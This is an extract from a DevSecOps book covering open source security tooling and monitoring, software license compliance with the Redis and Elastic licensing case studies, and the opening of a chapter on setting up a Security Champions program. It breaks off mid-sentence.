Implementing security controls DevSecOps programs ensure a proactive approach to security, making applications more resilient to attacks and ensuring compliance with industry standards and regulations. Let’s understand how implementing security controls can help in the context of DevSecOps: • Early detection: Catching vulnerabilities early reduces the cost and complexity of remediation • Continuous security: With security integrated at every step, the application is continuously checked for vulnerabilities, ensuring a robust security posture • Shared responsibility: Security becomes everyone’s responsibility, not just a siloed task for a security team • Source code repository: Use pre-commit or pre-receive hooks to enforce certain security checks even before the code is pushed: ‚ CI/CD pipeline integration: Help in automating the different phases and connecting the relevant tools. ‚ Build stage: Check dependencies for vulnerabilities. ‚ Test stage: Run SAST and DAST tools to identify potential vulnerabilities. ‚ Deployment stage: Ensure that configurations are checked before they’re deployed. Also, ensure secrets are securely managed and not hardcoded. • Feedback loop: Integrate tools with communication platforms (for example, Slack and Microsoft Teams) to notify developers immediately about identified vulnerabilities

Implementing security controls

Identifying open source security tools Identifying the right toolset is essential for a DevSecOps program to run properly and find the right set of vulnerabilities in the environment. The following are some of the tools that can be leveraged to test for security-related vulnerabilities or risks: • Vulnerability scanning: ‚ SAST: Tools such as Bandit (for Python) and Brakeman (for Ruby on Rails) analyze code for known patterns of vulnerabilities ‚ DAST: Tools such as OWASP ZAP and Arachni find vulnerabilities by actively probing running applications ‚ Dependency scanning: Tools such as OWASP Dependency-Check and Snyk check your third-party dependencies for known vulnerabilities • Configuration management: ‚ IaC scanners: Tools such as Checkov and Terrascan analyze IaC scripts for misconfigurations ‚ Container scanners: Tools such as Trivy, Clair, and Anchore scan Docker images for vulnerabilities ‚ Orchestration scanners: Tools such as kube-bench and kube-hunter assess Kubernetes clusters for misconfigurations and vulnerabilities ‚ Secrets management: Tools such as HashiCorp Vault manage and protect sensitive data, ensuring secrets aren’t hardcoded or exposed

Implementing security policies and procedures Clearly outline what is acceptable in terms of security. This can include password policies, coding standards related to security, and acceptable use policies: • Incident response plan: Have a clear and documented plan for when (not if) a security incident occurs. This includes identification, containment, eradication, recovery, and lessons learned phases. • Regular audits: Regularly check and ensure that all security measures are being followed and are effective. This can be done through internal audits or third-party security assessments. • Training and awareness: Conduct regular security training and awareness programs to ensure that every team member is up to date with the latest security practices and threats. • Continuous improvement: Security is an ever-evolving field. Regularly review and improve your policies and procedures based on new threats, technologies, and business needs.

167

168

Setting Up a DevSecOps Program with Open Source Tools

Managing DevSecOps in production DevSecOps in production involves not just deploying code but ensuring that the entire pipeline and the running applications remain secure, and compliant, and are continuously monitored for any potential threats or vulnerabilities. Security controls ensure that security measures are put in place to counteract vulnerabilities. Also, by carefully managing DevSecOps in production, organizations can ensure that their applications remain secure, compliant, and resilient against potential threats. It requires proactive monitoring, adherence to compliance standards, and a reactive plan in place for when things go wrong. Let’s break down them step by step.

Monitoring and managing the DevSecOps pipeline in production • Pipeline monitoring: Keep an eye on the CI/CD pipeline itself to ensure that all security checks are being executed, and no step is bypassed • Runtime monitoring: Continuously monitor the application in production for abnormal behavior or unauthorized access • Feedback loops: Ensure a mechanism is in place for developers and operations teams to receive immediate feedback on the build and security status

Using open source tools for monitoring, logging, and alerting • Monitoring: ‚ Prometheus: An open source system monitoring and alerting toolkit ‚ Grafana: An open source platform for monitoring and observability, often used with Prometheus • Logging: ‚ ELK Stack: A popular open source stack for searching, analyzing, and visualizing log data in real time ‚ Graylog: A powerful open source log management platform • Alerting: ‚ ElastAlert: Easy and flexible alerting for Elasticsearch ‚ Alertmanager: Handles alerts sent by client applications such as the Prometheus server

The benefits of the program

Incorporating continuous compliance and auditing into the pipeline • Automated compliance checks: Integrate tools that can automatically check for compliance as code moves through the pipeline • Open source compliance tools: ‚ OpenSCAP: Provides multiple tools to assist administrators and auditors with assessing, measuring, and enforcing security baselines ‚ Inspec: An open source testing framework that checks deployed infrastructures for compliance • Regular audits: Periodically perform security and compliance audits to ensure that the production environment adheres to required standards and policies

Managing incidents and responding to security breaches • Incident response plan: This should be a well-documented and practiced plan detailing the steps to take when a security incident occurs • Open source incident management tools: ‚ TheHive: A scalable, open source, and free security incident response platform ‚ Wazuh: This tool provides host-based security information and event management (HIDS, HIPS, log analysis, and more) • Communication: Have a clear communication plan to notify stakeholders, customers, or regulatory bodies if needed • Post-incident analysis: After resolving an incident, always conduct a post-mortem analysis to understand the root cause and improve the system to prevent similar incidents in the future

The benefits of the program A DevSecOps program is beneficial not only for creating a secure software development and deployment process but also for fostering a security-centric organizational culture. This can lead to better product quality, increased trust from customers and stakeholders, and a more resilient digital infrastructure. It merges the principles of DevOps with security, ensuring that security is an integral part of the development and deployment processes. Implementing a DevSecOps program can offer a wide range of benefits: • Early detection of vulnerabilities: Identifying security flaws earlier in the development life cycle reduces the time and cost associated with mitigating them later

169

170

Setting Up a DevSecOps Program with Open Source Tools

• Reduced attack surface: Continuous security checks and automated testing decrease the vulnerabilities that can be exploited • Faster remediation: Immediate feedback and automation enable developers to fix security issues more swiftly • Cost savings: Addressing vulnerabilities early in the software development process is more cost-effective than dealing with security breaches after deployment • Improved compliance: Continuous monitoring, logging, and auditing ensure alignment with security standards and regulations • Increased trust: Customers and stakeholders have greater trust in organizations that prioritize security in their development and deployment processes • Enhanced collaboration: DevSecOps promotes better collaboration between development, operations, and security teams, fostering a culture where security is everyone’s responsibility • Scalable security: Automation and integrated security tooling allow security practices to scale with the infrastructure and application complexity • Reduced downtime: With a proactive approach to security, the likelihood and duration of outages due to security incidents can be reduced • Secure code practices: Developers become more security-aware, leading to the production of more secure code from the outset • Continuous Improvement: DevSecOps practices promote iterative improvements, ensuring that security practices evolve with emerging threats • IaC security: Security is also integrated into the provisioning and management of infrastructure, not just the application code • Integrated toolchain: Seamlessly integrating various security tools into the CI/CD pipeline ensures comprehensive coverage across all stages of development and deployment • Shared security responsibility: Security is not a siloed responsibility but shared across teams, leading to holistic security practices • Streamlined operations: With automated security checks and balances, operational workflows become smoother and less error-prone • Enhanced incident response: A faster and more efficient response to security incidents is provided due to predefined procedures and tighter integration between teams • Higher release velocity: Secure and automated pipelines allow for faster, more frequent, and more reliable releases • Continuous monitoring: Real-time monitoring of applications and infrastructure ensures timely detection of and response to any anomalies

Summary

• Better risk management: With continuous insight into vulnerabilities and threats, organizations can better manage and mitigate risks • Security awareness and training: Continuous security integration in the DevOps process enhances awareness and offers regular training opportunities for the team

Summary In this chapter, we covered DevSecOps as a cultural shift that embeds security into every phase of the development process, emphasizing that security is a shared responsibility across teams. We talked about how we can set up the CI/CD pipeline using open source tools such as Jenkins, GitLab CI/CD, and Travis CI to automate building, testing, and deploying applications, making it easier to incorporate security checks at each stage. We also covered how to implement security controls: • Importance: They provide early vulnerability detection and continuous security checks, and distribute the security responsibility across the team • Tools: Various open source tools such as OWASP ZAP, Bandit, Trivy, and Checkov offer vulnerability scanning, configuration management, and more • Integration: Security controls should be deeply integrated into the DevSecOps pipeline, ensuring timely detection and mitigation of vulnerabilities Once deployed, the applications and pipeline itself must be monitored: • Monitoring tools: Prometheus and Grafana are for monitoring and visualization, respectively, not alerting • Continuous compliance: Regular audits, automated compliance checks, and tools such as OpenSCAP ensure constant alignment with security standards • Incident management: Having a robust incident response plan and tools such as TheHive helps in swiftly managing and mitigating security breaches The advantages of implementing a DevSecOps program are manifold, including early vulnerability detection, cost savings, improved compliance, increased trust, scalable security, and a shared sense of security responsibility. In the next chapter, we will discuss license compliance, code coverage, and baseline policies.

171

Part 5: Governance and an Effective Security Champions Program Governance covers the major aspects of measuring what is present and what can be fine-tuned. This part has the following chapters: • Chapter 13, Licenses Compliance, Code Coverage, and Baseline Policies • Chapter 14, Setting Up a Security Champions Program

13 License Compliance, Code Coverage, and Baseline Policies License compliance is not just a legal necessity but a critical component of software security and DevSecOps. It ensures that software is built on trust, transparency, and ethical practices, which are fundamental for the safe and efficient delivery of software in today’s digital age. License Compliance in software security entails adhering to the terms and conditions stipulated in the licensing agreements of software products and components. These licenses can range from open source licenses, such as the GNU General Public License (GPL) or the MIT license, to proprietary licenses issued by software vendors. License compliance, especially in the domains of software security and DevSecOps, is of paramount importance for various reasons: • Legal implications: Non-compliance with software licenses can lead to legal repercussions. For businesses, this can result in lawsuits, financial penalties, and reputational damage. DevSecOps practices promote swift software deliveries, and without proper license compliance checks, there’s a risk of inadvertently including non-compliant code. • Operational risks: Non-compliance can lead to the need to refactor or even completely replace certain components of a software project if it’s determined that they can’t legally be used. This can delay delivery timelines, especially in a DevSecOps environment where continuous integration (CI) and delivery are paramount. • Transparency and trust: DevSecOps emphasizes collaboration and transparency among teams. Proper license compliance extends this transparency, ensuring all stakeholders (including end users) that the software they’re using, developing, or delivering adheres to legal and ethical standards. • Vendor relationships: For organizations that use third-party software, license non-compliance can sour relationships with vendors. This could lead to increased costs or even termination

176

License Compliance, Code Coverage, and Baseline Policies

of service. In a DevSecOps pipeline, where third-party tools might be integrated for various functions, ensuring that all tools are compliant is crucial. • Financial implications: Apart from potential legal fines, non-compliance might incur additional costs. For instance, if a proprietary piece of software is used without a proper license, the organization might be liable to pay for its usage, often at a premium. • Reputation and brand value: In the open source community, trust and reputation are invaluable. Organizations that fail to comply with licensing agreements might find it challenging to collaborate on open source projects or to gain community support. This can hinder innovation and security efforts, especially in a DevSecOps context where community-driven tools and insights are vital. • Intellectual property protection: Ensuring license compliance protects the intellectual property rights of both the developers and the software providers. It delineates the boundaries of usage, modification, and distribution of software. • Security assurance: License compliance often entails a thorough review of the software components, which can help in identifying security vulnerabilities and ensuring that the software adheres to the required security standards. In this chapter, we will take a close look at these topics: • DevSecOps and its relevance to license compliance • The distinction between traditional licenses and security implications • Different types of software licenses • The impact of software licenses on the DevSecOps pipeline • How to perform license reviews • Fine-tuning policies associated with licenses • Case studies

DevSecOps and its relevance to license compliance DevSecOps, a fusion of development (Dev), security (Sec), and operations (Ops), is an organizational philosophy that integrates security practices within the DevOps process. DevSecOps aims to create a “security as code” culture with ongoing, flexible collaboration between release engineers and security teams. Let’s look at DevSecOps’ relevance to license compliance: • Early identification of compliance issues: Integrating license compliance within DevSecOps ensures that compliance issues are identified and addressed early in the development life cycle, reducing the time and cost of rectification

The distinction between traditional licenses and security implications

• Automated compliance checks: DevSecOps encourages automation, and automated compliance checks can be integrated within the CI/CD pipeline to ensure continuous adherence to licensing requirements • Consistent compliance management: With DevSecOps, compliance becomes a part of the routine process rather than an afterthought, ensuring a consistent approach to managing license compliance • Enhanced communication: DevSecOps fosters better communication between Dev, Ops, and Sec teams, ensuring that everyone is aware of the licensing requirements and compliances • Educational advancement: Continuous interaction with compliance and security issues educates the team on the importance of license compliance, and helps in better understanding and managing licensing requirements • Risk mitigation: By ensuring license compliance from the get-go, the risks associated with legal repercussions and security vulnerabilities are significantly mitigated In this chapter, we will cover the following topics: • The distinction between traditional licenses and security implications • Different types of software licenses • The impact of software licenses on the DevSecOps pipeline • How to perform license reviews • Fine-tuning policies associated with licenses • Case studies

The distinction between traditional licenses and security implications The distinction between traditional software licenses and the implications they may have on security can be quite nuanced. When we talk about traditional licenses, we usually refer to proprietary or closed source licenses as opposed to open source licenses. Each type of licensing comes with a set of benefits and challenges concerning software security. The choice between traditional proprietary licenses and open source licenses would largely depend on an organization’s security priorities, resource availability, and long-term strategic goals. In this section, we’ll provide a breakdown of the distinctions and their security implications.

177

178

License Compliance, Code Coverage, and Baseline Policies

Source code access • Traditional (proprietary) licenses. Typically, proprietary licenses do not provide access to the source code. Without source code access, identifying vulnerabilities or security flaws is challenging. Users must rely on the vendor to provide security patches and updates. • Open source licenses. These provide access to the source code to everyone. Having access to the source code allows for community scrutiny, which can lead to early detection and patching of vulnerabilities. However, it also exposes the code to potential malicious actors.

Modification and redistribution • Traditional (proprietary) licenses. Modification or redistribution of the software is usually prohibited or severely restricted. Restrictions on modification prevent users from patching vulnerabilities on their own, making them reliant on the vendor for security updates. • Open source licenses. These licenses allow modification and redistribution, promoting collaborative development. The ability to modify the code allows users or communities to address security issues proactively. However, redistributed versions could potentially introduce new vulnerabilities if not properly vetted.

Community oversight • Traditional (proprietary) licenses. There’s often little to no community oversight due to the closed nature of the source code. Limited oversight could lead to overlooked vulnerabilities, delayed detection, and patching of security issues. • Open source licenses. Open source software promotes community oversight and collaborative security efforts. A larger community working to identify and fix security issues can enhance the security posture of the software, though it also requires a well-coordinated effort to manage and vet contributions.

Vendor dependency • Traditional (proprietary) licenses: Users depend heavily on the vendor for updates, patches, and support. Vendor dependency can result in slower response times to security incidents and potential misalignment of security priorities between the vendor and the users. • Open source licenses: Less vendor dependency as the community can actively contribute to security improvements. Reduced vendor dependency can lead to quicker responses to security issues, though it may also result in fragmented solutions if the community is not well coordinated.

Different types of software licenses

Cost and resource allocation • Traditional (proprietary) licenses: Significant costs are usually involved in licensing fees and support contracts. Resource allocation for security measures may be limited by the costs of licensing and support. • Open source licenses: Usually, there’s a lower cost as no licensing fees are involved. Potentially more resources could be allocated for security measures, though it may also require more internal expertise to manage and secure open source software.

Different types of software licenses Software licenses are legal agreements that dictate how software can be used, modified, and distributed. They fall into several categories, including proprietary, open source, and freeware licenses. Proprietary licenses are characterized by strict control over the software’s use and distribution, often requiring payment, and typically don’t provide access to the source code. On the other hand, open source licenses can be more permissive, allowing access to the source code, modification, and redistribution, often free of charge. They can further be categorized into permissive licenses such as MIT and Apache, which have minimal restrictions, and copyleft licenses such as GPL and LGPL, which require any derivative work to be distributed under the same open source terms. Freeware licenses allow users to use software for free, but like proprietary software, the source code is not provided, and modifications are not allowed. Each license type has its implications on software development, security, and the broader software ecosystem that affect how individuals and organizations interact with the software. The different types of software licenses are as follows: • Permissive licenses (MIT, Apache) • Copyleft licenses (GPL, LGPL) • Proprietary license Let’s take a closer look.

Permissive licenses (MIT, Apache) Permissive licenses, also known as “liberal” or “free” licenses, are a type of open source license that imposes minimal restrictions on how the software can be used, modified, and shared. Key examples include the MIT license and the Apache license: • Minimal restrictions: They allow for the reuse, modification, and distribution of the software, with very few restrictions • No copyleft requirement: Unlike copyleft licenses, permissive licenses do not require derivative works to be released under the same license

179

180

License Compliance, Code Coverage, and Baseline Policies

• Attribution: Generally, they must be attributed to the original creators but have minimal other requirements • Patent rights: Some permissive licenses, such as the Apache license, provide explicit provisions on patent rights, granting a license from the contributors to use their patent claims

Security implications • Community inspection: The open nature of permissive licenses allows for community inspection and collaboration to identify and fix security vulnerabilities • Quick adaptation: They allow for quick adaptation and patching of software to address security concerns as there are fewer restrictions on modifications • No guaranteed security: While they enable community-driven security efforts, permissive licenses do not guarantee security and may require users to actively monitor and address security issues

Copyleft licenses (GPL, LGPL) Copyleft licenses are a subset of open source licenses that require any modifications or derivative works to be distributed under the same license as the original software: • Share-alike requirement: They require that modifications or derivative works be released under the same license, promoting free and open software use • Preservation of freedoms: They aim to ensure that the freedoms to use, study, share, and modify the software are preserved in derivative works • Strong versus weak copyleft: Some copyleft licenses (for example, GPL) have strong copyleft requirements, while others (for example, LGPL) have weaker copyleft requirements, allowing for more flexibility in how derivative works are licensed

The impact of software redistribution and modifications • Restrictive redistribution: The share-alike requirement can be restrictive as it mandates how derivative works can be redistributed • Encouragement of open collaboration: By requiring derivative works to remain open, copyleft licenses encourage open collaboration and the sharing of improvements • Compatibility issues: The strict licensing terms can lead to compatibility issues with other licenses, complicating software redistribution and integration

The impact of software licenses on the DevSecOps pipeline

Proprietary licenses • Source code access: Proprietary licenses typically do not provide access to the source code, while open source licenses do • Modification and redistribution: They often restrict or prohibit the modification, redistribution, and sharing of the software • Cost: Proprietary licenses usually require payment for use, while open source licenses often do not

Security constraints and obligations • Dependence on vendors: Users are often dependent on the vendors for security updates and patches • Limited scrutiny: The closed nature of proprietary software limits community scrutiny, which could potentially delay the identification and remediation of security vulnerabilities • Security through obscurity: Sometimes, the lack of source code access is seen as a security measure to prevent malicious actors from finding vulnerabilities, although “security through obscurity” is often criticized as ineffective

The impact of software licenses on the DevSecOps pipeline DevSecOps, a practice that integrates security within the DevOps process, necessitates a comprehensive understanding and management of software licenses to ensure both legal compliance and security. By weaving license management seamlessly into the DevSecOps pipeline, organizations can ensure a streamlined approach to achieving both security and legal compliance. This fusion aids in proactively identifying and mitigating risks, ensuring a robust, secure, and legally compliant software delivery life cycle (SDLC). Incorporating license management into the DevSecOps pipeline can significantly bolster security while ensuring adherence to legal requirements. Here’s how it unfolds: • Automatic license detection Tools such as FOSSA, Snyk, WhiteSource, and Black Duck can be integrated within the CI/CD pipeline to automatically detect and track the licenses of software components and dependencies to check for vulnerabilities. They can scan code repositories to identify license types and ensure they are compliant with an organization’s policies. Detecting licenses early in the DevSecOps pipeline allows for a proactive approach to managing legal and security risks. For instance, identifying a component with a restrictive license or one that hasn’t been properly maintained can mitigate potential legal disputes and security vulnerabilities.

181

182

License Compliance, Code Coverage, and Baseline Policies

• Enforcement of license policies By setting up automatic license scanning and enforcement rules within the CI/CD pipeline, non-compliant code can be flagged and blocked so that it isn’t merged into the main code base, ensuring only compliant and secure code is deployed. By monitoring the licenses of dependencies, teams can ensure they are using well-maintained and securely licensed components. This can also aid in identifying and replacing dependencies with vulnerabilities or those no longer maintained. Reporting and documentation • The importance of transparent license reporting in DevSecOps Transparent reporting of licenses helps maintain an auditable record of compliance and security measures. It fosters an environment of accountability and ensures all stakeholders are informed about the licensing landscape of the software. Documented license compliance aids in demonstrating due diligence in adhering to legal and security requirements. It can be instrumental during audits and can help in quickly addressing any license or security-related concerns raised by stakeholders.

How to perform license reviews License reviews are essential to ensure that the use, modification, and distribution of software and its dependencies comply with specified licensing agreements and do not pose legal or security risks to the organization. License reviews are an ongoing process and should be integrated as a fundamental practice within the DevSecOps pipeline to ensure legal compliance and security in software development and deployment. This section will provide a structured approach to conducting license reviews.

Tools and techniques • Automated tools such as FOSSA, Black Duck, or WhiteSource (Mend.io now) can scan code bases and identify the licenses of software components and dependencies. These tools can provide a comprehensive view of the licensing landscape, help track license compliance, and flag potential issues. • Automating the process can significantly expedite the review, ensuring continuous compliance monitoring throughout the development life cycle. • Despite the efficiency of automated tools, there are instances when a manual review is necessary – for example, when dealing with complex licensing scenarios, ambiguous licensing terms, or when automated tools cannot accurately identify a license. • Manual reviews should be thorough, conducted by individuals with a solid understanding of software licensing, and should cover all software components and dependencies.

Fine-tuning policies associated with licenses

Engaging legal and security teams • Establish a collaborative approach involving legal, security, and development teams to ensure a comprehensive license review. Each team brings a unique perspective – legal for compliance, security for risk assessment, and development for technical feasibility. • Regular meetings and communication channels among these teams can foster a better understanding of the licensing implications and ensure aligned objectives. • Engage the legal team to understand the legal implications of the licenses in use and to address any potential issues proactively. • The Sec team should assess the security implications of the licenses, especially in the case of open source components, and ensure that the license compliance process does not introduce security vulnerabilities. • Dev teams should be informed about the licensing requirements and should be prepared to address any licensing issues, which might include replacing non-compliant dependencies.

Documentation and continuous improvement • Document the findings of the license reviews and actions taken to address any issues, and maintain a repository of approved licenses and software components • This documentation can be crucial for auditing purposes and for informing future license review processes • Analyze the efficiency and effectiveness of the license review process regularly and identify areas for improvement • Stay updated on evolving licensing terms and ensure that the license review process adapts to any changes in the legal or security landscape

Fine-tuning policies associated with licenses Crafting well-defined license policies and fine-tuning them so that they align with organizational goals and legal and security standards is crucial in managing software licenses effectively. By fine-tuning license policies and establishing clear processes for managing exceptions, organizations can ensure a balanced approach to license management that aligns with legal requirements, security standards, and operational needs. This section breaks down how to fine-tune license policies.

183

184

License Compliance, Code Coverage, and Baseline Policies

Establishing an organizational standard • Create a clear list of approved licenses that are permissible for use within the organization. This list should be based on thorough legal and security reviews. • Equally important is to have a list of forbidden licenses that pose potential legal risks or have security implications that are not acceptable to the organization. • These guidelines should be easily accessible to all developers and should be incorporated into training and onboarding processes. • Involve legal and security teams in establishing license guidelines to ensure a balanced and comprehensive approach. • Assess licenses from a legal standpoint to ensure compliance with external regulations and internal policies. • Evaluate licenses from a security standpoint to ensure they do not introduce security vulnerabilities and are being managed securely.

Exception handling • Establish a clear process for handling exceptions, which could include a review by the legal and Sec teams, risk assessment, and a sign-off process by designated authorities. • Ensure that the exception process is well documented and transparent and includes an escalation path for addressing concerns or disputes. • Exceptions to license policies can introduce legal and security risks. It’s imperative to understand and document these risks thoroughly. • Evaluate the security implications of each exception, considering factors such as the trustworthiness and maintenance of the software, the community around it, and any known vulnerabilities. • Ensure that any additional risks introduced by an exception are managed and mitigated appropriately, with compensating controls if necessary.

Continuous review and improvement • Conduct regular reviews of license policies to ensure they remain relevant and effective in light of evolving legal, security, and technological landscapes. • Engage with external legal and security experts to ensure that license policies are robust and in line with industry best practices. • Establish a feedback loop with developers, legal, and Sec teams to learn from experiences, address concerns, and continuously improve the license management process.

Case studies

• Encourage a culture of open communication and learning to ensure that license policies support organizational goals while minimizing risks.

Case studies There are many case studies of organizations receiving legal penalties for running into issues because of license compliance. In this section, we’ll look at some examples of such case studies.

Case study 1 – the Redis licensing change Redis decided to move from GNU’s Affero General Public License (AGPL) to a new license named “Commons Clause,” which entailed additional restrictions, primarily to counter cloud providers who were profiting from Redis without contributing back. This licensing change sparked a debate within the community, with some members arguing that the new licensing terms were against the open source ethos. Furthermore, there were concerns about the potential introduction of security vulnerabilities, especially within third-party Redis modules due to the licensing shift, which could lead to lesser community engagement in vetting and improving the code.

Case study 2 – Elastic versus AWS licensing drama To counter AWS’s commercial services based on Elasticsearch, Elastic changed its license from open source to the Server Side Public License (SSPL). This move aimed to restrict cloud providers such as AWS from offering Elasticsearch as a service without purchasing a commercial license. AWS created a new fork of Elasticsearch under the old open source license, which created a bifurcation in the project. This split raised concerns about the continuity and security of both branches. There was unease about which branch would receive more robust security attention and updates, which could potentially leave users of the less-maintained branch vulnerable to security issues.

Summary As we conclude this chapter on license compliance, code coverage, and baseline policies within the context of software security and DevSecOps, we’ve navigated through the intricacies of software licensing and its critical role in maintaining legal and security standards across the development and deployment life cycle. We began by defining software licenses and emphasizing their importance in the realm of software security, setting the stage for understanding the various types of licenses – ranging from permissive and copyleft to proprietary – and their unique implications on software use and distribution.

185

186

License Compliance, Code Coverage, and Baseline Policies

When looking at the DevSecOps pipeline, we examined the impact of software licenses, highlighting the necessity of automated license detection and the benefits it brings to security and compliance. Tools such as FOSSA and Black Duck emerged as crucial in identifying and tracking licenses, while collaborative efforts among legal, security, and development teams were underscored as essential for a proactive stance on potential legal and security issues. The discussion on how to perform license reviews provided a practical guide, advocating for a blend of automated tools and manual processes, and stressing the importance of collaborative reviews that integrate the expertise of legal and security professionals. Furthermore, we delved into fine-tuning policies associated with licenses, illustrating the need for establishing organizational standards for preferred and forbidden licenses, and described a structured approach for exception handling to mitigate associated risks. This chapter was enriched with case studies – such as the Redis licensing change and Elastic versus AWS licensing drama– each offering real-world insights into the consequences of licensing decisions and underscoring the interplay between open source community dynamics and corporate strategies. The key takeaways from this chapter are as follows: • License compliance: This is a non-negotiable aspect of legal and security frameworks in software development • DevSecOps integration: License management must be seamlessly integrated into DevSecOps practices for effective security and compliance • Proactive measures: Regular license reviews and the use of automated tools are crucial for the early detection of compliance issues • Collaboration is key: A collaborative approach can help in finding and fixing problems related to licenses In the next chapter, we will cover what is the Security Champions Program and how to set it up and how it benefits us.

14 Setting Up a Security Champions Program Setting up a Security Champions program is a strategic move to weave cybersecurity into the very fabric of your organization’s culture and processes. This initiative involves identifying and empowering select individuals within your teams – our Security Champions – who will carry the torch of security practices within their respective domains. These Champions will be the frontrunners, advocating for secure coding practices, raising awareness of security threats, and ensuring that security is not just a checkbox in the development life cycle but an ongoing commitment. The program is more than just a set of tasks; it’s a transformative process that requires careful planning, clear communication, and continuous education. By embedding these advocates into the heart of your technical teams, you encourage a proactive stance on security issues, driving the organization’s DevSecOps program to new heights. The Security Champions program is your stepping stone to creating a resilient and security-conscious environment where every stakeholder understands their role in protecting the organization’s digital assets. Certain aspects will be covered as part of this chapter: • What is the Security Champions program? • Who should be a Security Champion? • The top benefits of starting a Security Champions program • What does a Security Champion do? • Security Champions program – why do you need it? • Shared responsibility models • The roles of different teams • Buy-in from the executive • Measuring the effectiveness of the Security Champions program

188

Setting Up a Security Champions Program

The Security Champions program A Security Champions program is essentially an initiative within an organization that aims to identify and train individuals from various development teams to take on the role of a Security Champion Think of these Champions as the superheroes of cybersecurity within their respective teams. They have a special interest in and knowledge of security, but they are also skilled developers, able to understand and speak the language of coding and application development. Their role in the organization involves doing the following: • Acting as the main point of contact for security-related questions or issues within their team • Spreading security awareness and good practices among their team members • Helping integrate secure coding practices into the software development life cycle (SDLC) • Liaising between their team and the dedicated security team of the organization, helping both sides understand each other’s needs and constraints • Assisting in risk assessments and security testing The program’s purpose is not just to bridge the gap but also to scale security across multiple development teams. The Security Champion is embedded within the development team, which allows them to incorporate security measures proactively and reactively as a part of the development process, rather than as an afterthought. This leads to more secure software and a more streamlined development process. You know how sometimes in sports, a player understands offense and defense and can help the two sides work together? That’s like a Security Champion in the world of software development. Imagine two groups of people trying to build a sandcastle at the beach. One group is focused on making the sandcastle quickly (these are the developers), while the other group is worried about protecting it from the waves (these are the security folks). The second group would wait until the sandcastle was mostly built and then add a wall of sand around it. This would sometimes slow down the build process and frustrate the first group. Now, imagine you have a person who understands both sides. They’re part of the first group, but they also care about keeping the sandcastle safe from waves. As the first group is building, this person is there to suggest they build on higher ground or add a wall from the beginning. They can translate the concerns of the second group into a language the first group understands. And they can help the second group understand what the first group is trying to do. This person is like a Security Champion. They’re a developer who’s also interested in security. They can help the developers and security folks understand each other and work together. They can ensure the developers consider security from the start, so there’s less reworking and frustration later on. Having a Security Champion can help teams build software that’s not just quick, but also safe. And who wouldn’t want that for their sandcastle?

The Security Champions program

Here are some things to consider when starting a Security Champions program that also shape the organization’s DevSecOps program: • Creating a knowledge hub within development teams: Consider your development team as a group of eager learners and your Security Champion as the knowledgeable teacher. The Champion helps make the team more independent by sharing critical security knowledge and best practices. It’s like having a classmate who’s good at math and can help everyone else understand complex problems. It’s often more effective to learn from peers, and the same applies to security practices in software development. • Scaling security through empowerment: Picture your organization as a bustling city. Your Dev team is the citizens, the Ops team is the service providers, and your Sec team is the police force. For every 100 citizens (developers), you might only have one police officer (security professional). The officer can’t be everywhere at once. So, by training and empowering citizen volunteers (Security Champions), you create a force multiplier, allowing security to scale in a non-linear way. • Personal growth and career advancement: For some developers, being a Security Champion is like having a golden ticket to a new career path. They’re naturally curious about security and want to learn more, not only to make the software they’re working on safer but also to enhance their skills. It’s like someone who loves playing football not just for fun but to eventually join a professional league. • Embedding security from the start: Imagine building a house. If you only think about security when the house is already built (such as installing a safe door or burglar alarms), it’s more troublesome and often less effective. It’s the same with software development. If security is an afterthought, it can disrupt the process and lead to suboptimal results. But if you think about security from the design phase itself (such as building a secure room in your house from the beginning), it’s more streamlined and yields better results. Security Champions ensure that security is built in from the start, not bolted on at the end. The following are things to consider when starting a Security Champions program from a people perspective: • Understanding team structures: Knowing the dynamics of each team, their workflows, and how they interact with other teams is vital. It will help in identifying the right personnel to act as Security Champions. • Selecting Champions: Choose Champions who are respected within their teams, have a keen interest in security, and are willing to bridge the gap between security and development. • Knowledge baseline: Establish a baseline of security knowledge that all Champions should possess. This ensures a uniform approach to security across the organization.

189

190

Setting Up a Security Champions Program

• Training and resources: Provide specialized training for Champions to enhance their security expertise. Ensure they have access to the right tools and resources to promote security within their teams. • Technologies in use: Have a clear understanding of the technologies used by different teams. This will help in tailoring the security practices to be technology-specific as needed. • Security as part of the SDLC: Integrate security into the SDLC so that it becomes an integral part of the process rather than an afterthought. • Current security posture: Assess the current security state of applications and infrastructure. This will serve as a benchmark to measure the impact of the Security Champions program. • Policy and governance: Establish clear security policies and governance models that Champions are expected to follow and enforce within their teams. • Communication channels: Set up effective communication channels for Champions to share knowledge, report issues, and collaborate on security-related matters. • Metrics and key performance indicators (KPIs): Define clear metrics and KPIs to track the performance of Security Champions and the overall health of the DevSecOps program. • Recognition and incentivization: Acknowledge the extra effort by the Champions and incentivize their contributions to encourage a culture of security. • Feedback loop: Create a feedback loop where Champions can provide insights to the security team, fostering continuous improvement. • Incident response planning: Ensure that Security Champions are involved in incident response planning to prepare teams for potential security events. • Continuous learning: The cybersecurity landscape is ever-changing. Encourage continuous learning and staying updated with the latest security trends and threats. • Support from leadership: Secure buy-in and continuous support from leadership to ensure that the Security Champions program is prioritized and adequately resourced.

Structuring your Security Champions program Think of starting a Security Champions program like hosting a potluck dinner. You wouldn’t just copy the menu from the last successful potluck you attended. Instead, you’d ask your guests about their food preferences and dietary restrictions. The same goes for your Security Champions program – you need to understand the unique needs and challenges of your teams before designing the program. In this potluck situation, the Security Champions are like the star chefs. They’re part of the guest list, not professional caterers hired for the event. They’re the ones who enjoy cooking and are willing to contribute a dish. It’s usually best if each guest brings their own dish – the same way each development team should ideally have one Security Champion. However, sometimes, a group of guests might

The Security Champions program

collaborate on a single dish – just like some teams might have multiple developers serving as Security Champions. This might create a bit of confusion over who to ask for the recipe, but it also means the cooking load doesn’t fall on just one person’s shoulders. Think of your Security Champions program as organizing a football team: • Understand the strengths and weaknesses of your team: Before you can start any program, you need to know what you’re working with. Just like a football coach, you need to understand your team’s current skills, their knowledge gaps, and the challenges they face on the field. • Choose the right players: Your Security Champions are like the key players in your team. They should be the ones who are not only skilled but are also enthusiastic about security. They’ll be the ones leading the charge on the field. • Assign roles and positions: Ideally, you should have one Security Champion for each development team – like having one key player for each position on the field. But depending on your team’s structure and size, you might need to adjust. For example, you might have more than one player sharing a position, or one player covering multiple positions. • Continuous training and practice: Just like in football, constant practice is essential in a Security Champions program. Your Champions need to keep learning and improving their security skills, which means you should provide them with regular training and educational resources. • Teamwork and coordination: Remember, the goal is not for the Security Champion to tackle all the security issues alone. It’s about working together with the rest of the development team, like a football player coordinating with their teammates to score a goal. The Champion should lead the team in implementing secure practices, but everyone has a role to play. • Monitor progress and adjust strategies: A good coach keeps track of their team’s performance and adjusts their strategies as needed. In the same way, you should monitor the progress 